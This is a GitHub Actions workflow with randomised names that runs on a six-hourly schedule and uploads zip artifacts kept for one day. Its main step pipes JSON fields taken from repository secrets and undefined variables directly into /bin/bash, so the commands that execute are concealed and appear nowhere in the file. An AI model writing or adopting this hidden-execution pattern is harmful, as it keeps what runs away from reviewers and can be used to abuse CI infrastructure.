name: chengdaolaijing
on:
  workflow_dispatch:

  schedule:
    - cron: '27 2,8,14,20 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chengdaolaijing
        env:
          jemrd06559: ${{ secrets.jemrd06559 }}
        run: |
          printf '%s' "$jemrd06559" | jq -r .n6294 | /bin/bash
          printf '%s' "$ga1665" | jq -r .yw9434 | /bin/bash
          printf '%s' "$xgej90" | jq -r .enfdx71 | /bin/bash
          echo $jxda7377 | jq -r .yvlsz199 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: Ef32weSN
          path: "*.zip"
          retention-days: 1
